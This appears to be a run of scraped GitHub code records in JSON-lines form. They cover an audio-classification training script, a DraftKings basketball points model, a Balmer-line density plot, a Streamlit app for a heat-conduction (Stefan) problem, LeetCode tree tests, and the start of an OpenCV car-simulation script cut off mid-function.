default='/dcase-ust-taxonomy.yaml')\n parser.add_argument(\"--output_dir\", type=str,default='/models')\n parser.add_argument(\"--train_feature_dir\", type=str, default='/logmel_h')\n parser.add_argument(\"--val_feature_dir\", type=str, default='/logmel_h')\n parser.add_argument(\"--load_checkpoint_path\", default='')\n \n parser.add_argument(\"--load_checkpoint\", default=False)\n parser.add_argument(\"--chs\", type=int, default=1)\n parser.add_argument(\"--kernel_size\", type=int,default=3)\n parser.add_argument(\"--layer_depth\", default=[64,128,256,256])\n parser.add_argument(\"--exp_id\", type=str, default='1')\n parser.add_argument(\"--max_ckpt\", type=int, default=20)\n parser.add_argument(\"--snapshot\", type=int, default=5)\n\n parser.add_argument(\"--hidden_layer_size\", type=int, default=256)\n parser.add_argument(\"--num_hidden_layers\", type=int, default=1)\n parser.add_argument(\"--lr\", type=float, default=1e-3)\n parser.add_argument(\"--l2_reg\", type=float, default=1e-4)\n parser.add_argument(\"--batch_size\", type=int, default=64)\n parser.add_argument(\"--n_epochs\", type=int, default=50)\n# parser.add_argument(\"--patience\", type=int, default=20)\n parser.add_argument(\"--label_mode\", type=str, choices=[\"fine\", \"coarse\"],\n default='coarse')\n\n args = parser.parse_args()\n\n # save args to disk\n \n model_path = os.path.join(args.output_dir, 'exp'+args.exp_id)\n os.makedirs(model_path, exist_ok=True)\n kwarg_file = os.path.join(model_path, \"hyper_params.json\")\n with open(kwarg_file, 'w') as f:\n json.dump(vars(args), f, indent=2)\n\n train(annotation_path = args.annotation_path, \n taxonomy_path = args.taxonomy_path, \n train_feature_dir = args.train_feature_dir, \n val_feature_dir = args.val_feature_dir,\n output_dir = args.output_dir, \n load_checkpoint = args.load_checkpoint,\n load_checkpoint_path = args.load_checkpoint_path,\n exp_id = args.exp_id, label_mode = \"coarse\", \n batch_size = args.batch_size, n_epochs = args.n_epochs, \n kernel_size = args.kernel_size, layer_depth = args.layer_depth, \n chs = args.chs, max_ckpt = args.max_ckpt,\n lr = args.lr, hidden_layer_size = args.hidden_layer_size, \n snapshot = args.snapshot,\n num_hidden_layers = args.num_hidden_layers, \n standardize = True,\n timestamp = None)\n","repo_name":"JishengBai/dcase2020_task5","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":25091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25355188709","text":"# coding: utf-8\nimport pandas as pd\nimport numpy as np\nfrom patsy import dmatrices\nimport statsmodels.api as sm\nimport pickle\n#from datetime import datetime, timedelta\nimport datetime\nfrom bs4 import BeautifulSoup\nimport requests\nimport cnfg\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nfrom collections import defaultdict\nfrom collections import OrderedDict\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nfrom proj_elastic import InsertLogs\nfrom sklearn import ensemble\nfrom sklearn.preprocessing import scale\nfrom sklearn.metrics import mean_squared_error\n\n\n# In[2]:\nconfig = cnfg.load(\"/home/ubuntu/dfsharp/.rotoguru_config\")\nurl = config[\"url\"]\n\n\ndef daily_download():\n # read in the user and key from config file\n # read in daily update of season long box scores\n df = pd.read_csv(url, sep=':')\n\n # format date as index, reset and sort old to new\n df.index = [pd.to_datetime(str(x), format='%Y%m%d') for x in df.Date]\n df.reset_index(inplace=True)\n df = df.sort(['index', 'Team'], ascending=[1, 1])\n\n # cut off note row\n df = df[1:]\n # rename some columns\n df = df.rename(columns={'H/A': 'home', 'First Last': 'name', 'Team pts': 'team_pts',\n 'Opp pts': 'opp_pts', 'DK Sal': 'dk_sal', 'DK pos': 'dk_pos',\n 'DK Change': 'dk_change', 'GTime(ET)': 'gametime'})\n\n # only use these columns (for now)\n df = df[['index', 'GameID', 'gametime', 'name', 'Minutes', 'Start', 'active', 'DKP', 'Team', 'Opp',\n 'home', 'team_pts', 'opp_pts', 'dk_sal', 'dk_pos', 'dk_change', 'Stats', 'DoubleD']]\n\n # only train on players who played > 0 minutes (keep today's players in\n # frame)\n today = datetime.datetime.today()\n df = df[(df['active'] > 0) | (df['index'] == today.strftime('%Y%m%d'))]\n\n return(df)\n\n\n# In[3]:\n\ndef make_dvp(df):\n # create sportvu clusters\n cdf = pd.read_csv(\n '/home/ubuntu/dfsharp/sportvu_clusters.csv',\n sep='\\t',\n encoding='utf-16')\n df = df.merge(cdf[['Name', 'Cluster Position Off', 'Cluster Position Def']].drop_duplicates(\n subset=['Name']), how='left', left_on='name', right_on='Name')\n df['Cluster Position Off'] = df[\n 'Cluster Position Off'].fillna(df['dk_pos'])\n df['kpos'] = df['Cluster Position Off']\n return(df)\n\n\ndef add_pace(df):\n holl = pd.read_html('http://espn.go.com/nba/hollinger/teamstats')\n holl = holl[0][1:]\n holl.columns = holl.iloc[0]\n holl = holl.reindex(holl.index.drop(1))\n holl.set_value(3, 'TEAM', 'Oklahoma')\n # read in crosswalk\n teams = pd.read_csv('/home/ubuntu/dfsharp/team_crosswalk.csv', sep='\\t')\n\n holl = pd.merge(\n left=holl,\n right=teams,\n left_on='TEAM',\n right_on='team_city')\n holl['team'] = holl['team'].str.lower()\n # merge team stats into real\n holl = holl[['team', 'team_city', 'PACE', 'AST', 'TO', 'ORR',\n 'DRR', 'REBR', 'EFF FG%', 'TS%', 'OFF EFF', 'DEF EFF']]\n holl = holl.rename(columns={'OFF EFF': 'OFF_EFF', 'DEF EFF': 'DEF_EFF'})\n holl['PACE'] = pd.to_numeric(holl['PACE'])\n holl['OFF_EFF'] = pd.to_numeric(holl['OFF_EFF'])\n holl['DEF_EFF'] = pd.to_numeric(holl['DEF_EFF'])\n\n hero_pace = holl[['team', 'PACE', 'OFF_EFF']]\n villain_pace = holl[['team', 'PACE', 'DEF_EFF']]\n villain_pace = villain_pace.rename(columns={'PACE': 'PACE_OPP'})\n\n df = pd.merge(\n left=df,\n right=hero_pace,\n left_on='Team',\n right_on='team',\n how='left')\n df = pd.merge(\n left=df,\n right=villain_pace,\n left_on='Opp',\n right_on='team',\n how='left')\n df['pace_sum'] = df['PACE'] + df['PACE_OPP']\n\n return(df)\n\n# total active games per player\n\n\ndef active_games(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(350)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].active.sum()\n# avg minutes past 7 days\n\n\ndef min_avg_7_days(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(7)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].Minutes.mean()\n# avg MPG when >0 past 90 days *used for dk/min\n\n\ndef min_avg_90_days(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(90)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].Minutes.mean()\n# dk pts scored past 90 days * used for dk/min\n\n\ndef dk_avg_90_days(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(90)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].DKP.mean()\n# pts scored by team past 90 days [deprecated]\n# def team_pts_90_days(x):\n# return df[(df['index'] >= x['index'] - pd.DateOffset(90)) & (df['index'] < x['index']) & (df['Team'] == x['Team'])]['team_pts'].mean()\n# pts allowed by opponent past 90 days\n\n\ndef opp_pts_90_days(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(90)) & (df['index']\n < x['index']) & (df['Opp'] == x['Opp'])]['team_pts'].mean()\n# draftkings standard deviation!\n\n\ndef dk_std_90_days(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(90)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].DKP.std()\n# draftkings local MAX\n\n\ndef dk_max_30_days(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(30)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].DKP.max()\n# create avg minutes when starting\n\n\ndef min_when_starting(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(150)) & (df['Start'] == 1)\n & (df['index'] < x['index']) & (df['name'] == x['name'])].Minutes.mean()\n# create avg minutes when starting\n\n\ndef min_when_bench(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(150)) & (df['Start'] == 0)\n & (df['index'] < x['index']) & (df['name'] == x['name'])].Minutes.mean()\n\n\ndef starts_past_week(x):\n return df[(df['gp'] >= x['gp'] - 3) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].Start.sum()\n# if they're starting today, and they have <= 1 start in past 7 days, use\n# min_when_start instead\n\n\ndef adjust_minutes(row):\n if (row['Start'] == True) and (row['starts_past_week'] <= 1) and (\n row['min_when_start'] > row['min_3g_avg']):\n return(row['min_when_start'])\n else:\n return(row['min_3g_avg'])\n# create DKP allowed vs each position by team\n\n\ndef dvp(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(180)) & (df['index'] <\n x['index']) & (df['Opp'] == x['Opp']) & (df['kpos'] == x['kpos'])]['DKP'].mean()\n# minutes yesterday\n\n\ndef min_yest(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(1)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].Minutes.mean()\n# create back to back boolean\n\n\ndef create_b2b_bool(row):\n if row['min_yest'] > 30:\n return(1)\n else:\n return(0)\n# 1) need Team MP, Team FGA, team FTA, team TOV for usage\n\n\ndef team_mp(x):\n return df[(df['index'] == x['index']) & (\n df['Team'] == x['Team'])]['Minutes'].sum()\n\n\ndef team_fga(x):\n return df[(df['index'] == x['index']) & (\n df['Team'] == x['Team'])]['fga'].sum()\n\n\ndef team_fta(x):\n return df[(df['index'] == x['index']) & (\n df['Team'] == x['Team'])]['fta'].sum()\n\n\ndef team_tov(x):\n return df[(df['index'] == x['index']) & (\n df['Team'] == x['Team'])]['tov'].sum()\n# USAGE: 100 * ((FGA + 0.44 * FTA + TOV) * (Tm MP / 5)) / (MP * (Tm FGA +\n# 0.44 * Tm FTA + Tm TOV)).\n\n\ndef usage(x):\n try:\n usage = 100 * ((x['fga'] + 0.44 * x['fta'] + x['tov']) * (x['team_mp'] / 5)) / (\n x['Minutes'] * (x['team_fga'] + 0.44 * x['team_fta'] + x['team_tov']))\n except ZeroDivisionError:\n usage = 0\n if (usage > 50):\n usage = 50\n return(usage)\n\n\ndef usage_3g_avg(x):\n return df[(df['gp'] >= x['gp'] - 3) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].usage.mean()\n\n\ndef usage_5g_avg(x):\n return df[(df['gp'] >= x['gp'] - 5) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].usage.mean()\n# historical value\n\n\ndef value(x):\n val = x['DKP'] / (x['dk_sal'] / 1000)\n return(val)\n\n\ndef value_3g_avg(x):\n return df[(df['gp'] >= x['gp'] - 3) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].value.mean()\n\n\ndef min_3g_avg(x):\n return df[(df['gp'] >= x['gp'] - 3) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].Minutes.mean()\n\n\ndef starter_min(x):\n return df[(df['index'] == x['index']) & (\n df['Team'] == x['Team']) & df['Start'] == 1].Minutes.mean()\n\n\ndef starter_5g_avg(x):\n return df[(df['gp'] >= x['gp'] - 5) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].starter_min.mean()\n# minutes vs starters 5 game average\n\n\ndef mvs_5g_avg(x):\n return df[(df['gp'] >= x['gp'] - 5) & (df['gp'] < x['gp']) &\n (df['name'] == x['name'])].min_vs_starters.mean()\n# add up their total double doubles\n\n\ndef dbl_dbl(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(350)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].DoubleD.sum()\n# 3game avg of FGA\n\n\ndef fga_3g_avg(x):\n return df[(df['gp'] >= x['gp'] - 3) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].fga.mean()\n'''\nadd_stats- adds stats\n input: dataframe sorted ascending by dates\n outputs: same frame with added stat columns\n'''\n\n\ndef add_stats(df):\n\n df['gp'] = df.apply(active_games, axis=1)\n df['min_3g_avg'] = df.apply(min_3g_avg, axis=1)\n\n #df['min_7d_avg'] = df.apply(min_avg_7_days, axis=1)\n df['min_90d_avg'] = df.apply(min_avg_90_days, axis=1)\n df['dk_avg_90_days'] = df.apply(dk_avg_90_days, axis=1)\n # df['teampts_avg'] = df.apply(team_pts_90_days, axis=1)\n # df['opppts_avg'] = df.apply(opp_pts_90_days, axis=1)\n df['dk_per_min'] = df['dk_avg_90_days'] / df['min_90d_avg']\n # transform DK points to more normal distro\n df['DKP_trans'] = df['DKP']**.5\n # create columns for - positive DK change; negative DK change\n # df['dk_sal_increase'] = np.where((df['dk_change'] > 0), True, False)\n # df['dk_sal_decrease'] = np.where((df['dk_change'] < 0), True, False)\n # create standard dev and max columns\n df['dk_std_90_days'] = df.apply(dk_std_90_days, axis=1)\n df['dk_max_30_days'] = df.apply(dk_max_30_days, axis=1)\n # get min when starting / bench\n df['min_when_start'] = df.apply(min_when_starting, axis=1)\n df['min_when_bench'] = df.apply(min_when_bench, axis=1)\n # count games started in past week\n df['starts_past_week'] = df.apply(starts_past_week, axis=1)\n # adjust minutes\n df['min_proj'] = df.apply(adjust_minutes, axis=1)\n # add dvp\n df['dvp'] = df.apply(dvp, axis=1)\n # add dvp rank\n df['dvprank'] = pd.qcut(\n df['dvp'], [\n 0.05, 0.1, 0.25, 0.5, 0.75, .93, 1], labels=False)\n # combine PACE and dvp\n df['pace_dvp'] = (df['pace_sum'] / 10) + df['dvp']\n\n # create summary stats\n df['pts'] = df['Stats'].str.extract('(\\d*)pt')\n df['rbs'] = df['Stats'].str.extract('(\\d*)rb')\n df['stl'] = df['Stats'].str.extract('(\\d*)st')\n df['ast'] = df['Stats'].str.extract('(\\d*)as')\n df['blk'] = df['Stats'].str.extract('(\\d*)bl')\n df['3pm'] = df['Stats'].str.extract('(\\d*)trey')\n df['fgm'] = df['Stats'].str.extract('(\\d*)-\\d*fg')\n df['fga'] = df['Stats'].str.extract('\\d*-(\\d*)fg')\n df['ftm'] = df['Stats'].str.extract('(\\d*)-\\d*ft')\n df['fta'] = df['Stats'].str.extract('\\d*-(\\d*)ft')\n df['tov'] = df['Stats'].str.extract('(\\d*)to')\n df[['pts',\n 'rbs',\n 'stl',\n 'ast',\n 'blk',\n '3pm',\n 'fgm',\n 'fga',\n 'ftm',\n 'fta',\n 'tov']] = df[['pts',\n 'rbs',\n 'stl',\n 'ast',\n 'blk',\n '3pm',\n 'fgm',\n 'fga',\n 'ftm',\n 'fta',\n 'tov']].apply(lambda x: pd.to_numeric(x,\n errors='coerce'))\n df[['pts', 'rbs', 'stl', 'ast', 'blk', '3pm', 'fgm',\n 'fga', 'ftm', 'fta', 'tov']].fillna(0, inplace=True)\n\n # add yesterdays minutes\n df['min_yest'] = df.apply(min_yest, axis=1)\n # create back to back boolean column [over 30 minutes played the prior day]\n df['b2b'] = df.apply(create_b2b_bool, axis=1)\n\n # fillna just in case\n df['Minutes'] = df['Minutes'].fillna(value=0)\n df['fga'] = df['fga'].fillna(value=0)\n df['fta'] = df['fta'].fillna(value=0)\n df['tov'] = df['tov'].fillna(value=0)\n\n # add team stats for usage calc\n df['team_mp'] = df.apply(team_mp, axis=1)\n df['team_fga'] = df.apply(team_fga, axis=1)\n df['team_fta'] = df.apply(team_fta, axis=1)\n df['team_tov'] = df.apply(team_tov, axis=1)\n\n # add individual usage / 3 game rolling avg\n df['usage'] = df.apply(usage, axis=1)\n df['usage_3g_avg'] = df.apply(usage_3g_avg, axis=1)\n df['usage_5g_avg'] = df.apply(usage_5g_avg, axis=1)\n\n # add value / 3 game rolling avg for val\n df['value'] = df.apply(value, axis=1)\n df['value_3g_avg'] = df.apply(value_3g_avg, axis=1)\n\n # add starter min - average minutes played of all the starters\n df['starter_min'] = df.apply(starter_min, axis=1)\n\n # add game by game minutes vs starter average\n df['min_vs_starters'] = df['Minutes'] - df['starter_min']\n df['mvs_5g_avg'] = df.apply(mvs_5g_avg, axis=1)\n\n # add 3game average of starter minutes\n df['starter_5g_avg'] = df.apply(starter_5g_avg, axis=1)\n\n # add rolling avg of fga\n df['fga_3g_avg'] = df.apply(fga_3g_avg, axis=1)\n\n # add double double count\n df['dbl_dbl_cnt'] = df.apply(dbl_dbl, axis=1)\n # create \"double double per game\" stat\n df['dbl_dbl_per_game'] = df['dbl_dbl_cnt'] / df['gp']\n # combo stat: Minutes + FGA + dbl_dbl_per_game\n df['combo'] = df['min_proj'] + df['dbl_dbl_per_game'] + df['fga_3g_avg']\n\n return(df)\n\n''' train_model - trains linear regression on given df\n inputs: df - dataframe to train on\n num - num to start slice at\n outputs: fitted model\n side-effects: prints summary statistics\n pickles model\n'''\n\n\ndef train_save_model(df, num=0, num2=20000):\n # train on most recent 30 days?\n #train = df[num:num2].dropna(subset=['DKP_trans','Start','dk_avg_90_days','home','dvp','usage_5g_avg','min_proj'])\n train = df[\n num:num2].dropna(\n subset=[\n 'DKP',\n 'Start',\n 'dk_per_min',\n 'dvprank',\n 'pace_sum',\n 'min_proj',\n 'home'])\n Y_train, X_train = dmatrices('''DKP ~ Start + dk_per_min + dvprank + pace_sum + min_proj + home\n ''', data=train, return_type='dataframe')\n\n model = sm.OLS(Y_train, X_train)\n results = model.fit()\n print(results.summary())\n path = '/home/ubuntu/dfsharp/latest_model1.p'\n pickle.dump(results, open(path, \"wb\"))\n return(results)\n\n\ndef train_save_booster(df, num=0, num2=20000):\n # Load data\n df = df[num:num2].dropna(\n subset=[\n 'DKP',\n 'Start',\n 'dk_per_min',\n 'dvprank',\n 'pace_sum',\n 'min_proj',\n 'home'])\n\n #X = scale(df[['Start','dk_per_min','pace_dvp','combo']])\n df['home'] = df['home'].map({'H': 1.0, 'A': 0.0})\n X = scale(df[['Start', 'dk_per_min', 'dvprank',\n 'pace_sum', 'min_proj', 'home']])\n X = X.astype(np.float32)\n y = df['DKP']\n\n # Fit regression model\n params = {'n_estimators': 450, 'max_depth': 2, 'min_samples_split': 5, 'min_samples_leaf': 4, 'max_features': 0.3,\n 'learning_rate': 0.1, 'loss': 'ls'}\n clf = ensemble.GradientBoostingRegressor(**params)\n\n clf.fit(X, y)\n print(clf.score(X, y))\n path = '/home/ubuntu/dfsharp/latest_model.p'\n pickle.dump(clf, open(path, \"wb\"))\n return(clf)\n\n# '''\n# A) daily download\ndf = daily_download()\n\n# B) create DVP\ndf = make_dvp(df)\n\n# C) add pace\ndf = add_pace(df)\n\n# D) add stats\ndf = add_stats(df)\n# (optional) skip stat creation and load latest gamelogs df\n#df = pd.read_csv('/home/ubuntu/dfsharp/gamelogs.csv')\nprint(len(df))\ndf.Date = df['GameID'].str[:8]\n\n# E) pull out todays frame\ntoday = datetime.datetime.today() - datetime.timedelta(hours=4)\n#todays_players = df[df['index'] == today.strftime('%Y%m%d')]\ntodays_players = df[df.Date == today.strftime('%Y%m%d')]\n\nprint(len(todays_players))\n\n\ncsvpath = '/home/ubuntu/dfsharp/csvs/' + \\\n today.strftime('%Y%m%d') + '_players.csv'\ntodays_players.to_csv(csvpath)\n# F) insert gamelogs into elasticsearch, save to CSV\nnot_today = df[df['index'] != today.strftime('%Y%m%d')]\nnot_today.to_csv('gamelogs.csv')\nInsertLogs(not_today, indexer=\"gamelogs\")\n\n# '''\n# optional\n# df = pd.read_csv('/home/ubuntu/dfsharp/gamelogs.csv')\n# G) remove outliers for model training\ndf = df[df['dvp'] < 29]\ndf = df[df['dvp'] > 12]\ndf = df[df['dk_avg_90_days'] > 0]\ndf = df[df['Minutes'] > 1]\n#df = df[df['fga'] > 0]\n\n\n# H) train and save the model\nyo = train_save_booster(df, 5000, 20000)\nreg = train_save_model(df, 5000, 20000)\n","repo_name":"shermanash/DFSharp","sub_path":"generate_model.py","file_name":"generate_model.py","file_ext":"py","file_size_in_byte":17355,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"1307207495","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport fractions\nimport balmer_lines_a as a\nimport balmer_lines_b as b\n\ntemp = np.linspace(0,30000,100)\ny = []\n\nfor t in temp:\n boltzmann = a.boltzmann(t)\n fraction = fractions.Fraction(boltzmann)\n fraction = str(fraction).split('/')\n if len(fraction) > 1:\n n_s2 = int(fraction[0])\n total = int(fraction[0]) + int(fraction[1])\n # n_s2/(n_s1 + n_s2)\n else:\n y.append(0)\n continue\n \n saha = b.saha(t)\n fraction_saha = fractions.Fraction(saha)\n fraction_saha = str(fraction_saha).split('/')\n if len(fraction_saha) > 1:\n total = int(fraction_saha[0]) + int(fraction_saha[1])\n n_H0 = int(fraction_saha[1])\n n_Hplus = int(fraction_saha[0])\n n_H = total\n else:\n y.append(1)\n continue\n\n y.append((n_H0 * n_s2) / (n_H * 10**17))\n\nfig, ax = plt.subplots()\n\nax.plot(temp,y, '.')\nax.set_xlabel('Temperatur [K]')\nax.set_ylabel('Combined density')\n\nplt.show()","repo_name":"LenaMesserschmidt/astro-gk","sub_path":"task3/balmer_lines_c.py","file_name":"balmer_lines_c.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21543507132","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\nimport streamlit as st\nimport time\nfrom exact import T\nimport streamlit.components.v1 as components\n\ndef form_grid_data():\n with st.form(key=\"grid_data\"):\n st.header('Параметры сетки')\n dx = st.number_input('Шаг сетки по пространству, м', value=1)\n dt = st.number_input('Шаг сетки по времени, дни', value=1)\n #t = 0\n #time_interval = []\n zbf = []\n #res = []\n # Hbf = st.metric(\"Глубина промерзания, м\", value=zbf)\n if 'zbf' not in st.session_state:\n st.session_state.zbf=zbf\n T_end = st.number_input('Время окончания расчета, дни', value=st.session_state.problem['T_end'])\n submitted = st.form_submit_button('Расчитать')\n if 'my_bar' not in st.session_state:\n st.session_state.my_bar = st.progress(0)\n if 'placeholder' not in st.session_state:\n st.session_state.placeholder = st.empty()\n if 'sol_plot' not in st.session_state:\n st.session_state.sol_plot = st.empty()\n # st.header(\"Результаты\")\n if submitted:\n st.session_state.my_bar.progress(0)\n dt *= 86400\n T_end *= 86400\n st.session_state.zbf, st.session_state.res = exact_solution(dx, dt, T_end=T_end)\n # print(f'zbf={st.session_state.zbf}')\n\ndef description():\n col1, col2 = st.columns([3,2])\n with col1:\n st.latex(r'''\n c_i \\frac{T_i^{j+1} - T_i^j}{\\tau} = \\frac{1}{h^2} \\left( a_{i+1/2} \\left( T_{i+1}^j - T_{i}^j \\right) - a_{i-1/2} \\left( T_{i}^j - T_{i-1}^j \\right) \\right),\n ''')\n st.latex(r'''\n c_i = C_{\\mathrm{eff}}(T_{i}^j), \\quad\n a_{i+1/2} = 0.5 (\\lambda(T_{i+1}^j) + \\lambda(T_{i}^j)),\n ''')\n st.latex(r'''\n T_i^0 = T_0, \\quad\n i = 1, 2, \\ldots, N-1,\n ''')\n st.latex(r'''\n T_0^{j+1} = T_{\\mathrm{bnd}}, \\quad\n a_{N+1/2} \\frac{T_{N+1}^{j} - T_{N-1}^{j}}{h} = 0,\\quad j = 0, 1, \\ldots, M,\n ''')\n st.write('Выражаем значение на следующем временном шаге $T_i^{n+1}$')\n st.latex(r'''\n T_i^{j+1} = T_i^j + \\frac{\\tau}{c_i h^2} \\left( a_{i+1/2} \\left( T_{i+1}^j - T_{i}^j \\right) - a_{i-1/2} \\left( T_{i}^j - T_{i-1}^j \\right) \\right), \\quad i = 1, 2, \\ldots, N-1,\n ''')\n #\n st.latex(r'''\n T_0^{j+1} = T_{\\mathrm{bnd}}, \\quad\n T_N^{j+1} = T_N^j - \\frac{\\tau}{c_N h^2} \\left( \\lambda(T_{N-1}^j) \\left( T_{N-1}^j - T_{N}^j \\right) \\right), \n ''')\n with col2:\n st.image('./imgs/time-space-grid.png')\n\ndef exact_solution(dx, dt, T_end=20):\n st.session_state.my_bar.progress(0)\n z = np.linspace(0, st.session_state.problem['H'], int(st.session_state.problem['H']/dx)+1)\n t = 0\n time_interval = [0]\n zbfs = [0]\n res = [T(z,0)]\n fig, ax = plt.subplots(figsize=(3,1.5))\n ax.set_xlabel('Глубина, м')\n ax.set_ylabel('Температура, К')\n plotLine, = ax.plot(z, res[0][1])\n plotTitle = ax.set_title('t = 0')\n line = go.Scatter(x=z.flatten(), y=res[0][1])\n frames = []\n # with st.session_state.sol_plot.container():\n # st.pyplot(fig)\n day=0\n rem_t = float(T_end)\n while t < T_end:\n rem_t = T_end - t\n dt = dt if rem_t > dt else rem_t\n t += dt\n day = int(t/86400)\n u = np.zeros_like(z)\n zbf, u = T(z, t)\n time_interval.append(t)\n zbfs.append(zbf)\n# time.sleep(0.05)\n with st.session_state.placeholder.container():\n st.header('Результаты')\n col1, col2 = st.columns(2)\n with col1:\n st.metric(\n label='День',\n value=day)\n st.metric(\n label='Глубина промерзания, м',\n value=zbf\n )\n with col2:\n with st.session_state.sol_plot.container():\n line = go.Scatter(x=z.flatten(), y=u)\n\n button = {\n \"type\": \"buttons\",\n \"buttons\": [\n {\n \"label\": \"Просмотр\",\n \"method\": \"animate\",\n \"args\": [None, {\"frame\": {\"duration\": 20}}],\n }\n ]\n }\n layout = go.Layout(updatemenus=[button],\n title_text=f'{t/86400} день'\n )\n\n frame = go.Frame(\n data = [line],\n layout = go.Layout(title_text=f'{t/86400} день')\n )\n\n frames.append(frame)\n\n fig = go.Figure(data=[line], frames=frames, layout=layout)\n st.plotly_chart(fig, use_container_width=True)\n # plotLine.set_ydata(u)\n# plotTitle.set_text(f'{t/86400} день')\n# # components.html(fig_html, height=300)\n# st.pyplot(fig)\n\n \n res.append(u)\n st.session_state.my_bar.progress(t/T_end)\n return zbfs, res\n\ndef ds_page():\n #print(f'session_state_here={st.session_state}')\n st.title('Разностная схема')\n #print(f'problem={st.session_state.problem.prm},\\n soil={st.session_state.Soil.prm}')\n description()\n form_grid_data()\n# print(f'session_state_and_here={st.session_state}')\n# form_viz_data()\n\n","repo_name":"slemeshevsky/stefan","sub_path":"ds_page.py","file_name":"ds_page.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41878551456","text":"from unittest import TestCase\n\nfrom leetcodepy.binary_tree_level_order_traversal_ii import *\nfrom leetcodepy.utils import trees\n\nSOLUTION1 = Solution1()\nSOLUTION2 = Solution2()\n\nROOT1 = trees.from_values(3, 9, 20, None, None, 15, 7)\nEXPECTED1 = [\n [15, 7],\n [9, 20],\n [3]\n]\n\nROOT2 = trees.from_values(1)\nEXPECTED2 = [[1]]\n\nROOT3 = trees.from_values()\nEXPECTED3 = []\n\n\nclass TestBinaryTreeLevelOrderTraversalII(TestCase):\n def test1(self):\n self.assertListEqual(EXPECTED1, SOLUTION1.levelOrderBottom(ROOT1))\n self.assertListEqual(EXPECTED2, SOLUTION1.levelOrderBottom(ROOT2))\n self.assertListEqual(EXPECTED3, SOLUTION1.levelOrderBottom(ROOT3))\n\n def test2(self):\n self.assertListEqual(EXPECTED1, SOLUTION2.levelOrderBottom(ROOT1))\n self.assertListEqual(EXPECTED2, SOLUTION2.levelOrderBottom(ROOT2))\n self.assertListEqual(EXPECTED3, SOLUTION2.levelOrderBottom(ROOT3))\n","repo_name":"qianbinbin/leetcode","sub_path":"python3/tests/test_binary_tree_level_order_traversal_ii.py","file_name":"test_binary_tree_level_order_traversal_ii.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"39333628451","text":"import cv2 as cv\nimport numpy as np\nimport random\nimport copy\n\ndef carBody(arr, img):\n cv.rectangle(img, arr, arr, (255,255,255), 5)\n return img\n\ndef dtCollisionBoundaries(arr):\n if (arr[0] <= 45):\n return True\n if (arr[1] <= 75) or (arr[1] >= 475):\n return True\n return False\n\ndef dtDestination(arr):\n if (arr[0] >= 835):\n return True\n return False\n\ndef getDisplay(arr):\n img = np.zeros((512, 900, 3), dtype=\"uint8\")\n img = carBody(arr, img)\n boundaryPts = np.array([[40, 70], [40, 470],\n [840, 470], [840, 70]],\n np.int32)\n boundaryPts = boundaryPts.reshape((-1, 1, 2))\n\n destPts = np.array([[840, 470], [840, 70]],\n np.int32)\n destPts = destPts.reshape((-1, 1, 2))\n\n hindPts1 = np.array([[194, 474], [194, 304]],\n np.int32)\n hindPts1 = hindPts1.reshape((-1, 1, 2))\n\n hindPts2 = np.array([[408, 474], [408, 304]],\n np.int32)\n hindPts2 = hindPts2.reshape((-1, 1, 2))\n\n hindPts3 = np.array([[682, 474], [682, 304]],\n np.int32)\n hindPts3 = hindPts3.reshape((-1, 1, 2))\n\n hindPts4 = np.array([[281, 69], [281, 231]],\n np.int32)\n hindPts4 = hindPts4.reshape((-1, 1, 2))\n\n hindPts5 = np.array([[541, 69], [541, 231]],\n np.int32)\n hindPts5 = hindPts5.reshape((-1, 1, 2))\n\n isClosed = True\n thickness = 8\n img = cv.polylines(img, [boundaryPts],\n isClosed, (0, 255, 0),\n thickness)\n img = cv.polylines(img, [destPts],\n isClosed, (0, 0, 255),\n thickness)\n img = cv.polylines(img, [hindPts1],\n isClosed, (120, 120, 0),\n thickness)\n img = cv.polylines(img, [hindPts2],\n isClosed, (120, 120, 0),\n thickness)\n img = cv.polylines(img, [hindPts3],\n isClosed, (120, 120, 0),\n thickness)\n img = cv.polylines(img, [hindPts4],\n isClosed, (120, 120, 0),\n thickness)\n img = cv.polylines(img, [hindPts5],\n isClosed, (120, 120, 0),\n thickness)\n return img\n\ndef collisionWithHind(arr):\n #[194, 474], [194, 304]\n if (190 <= arr[0] <= 199) and (304 <= arr[1] <= 474):\n 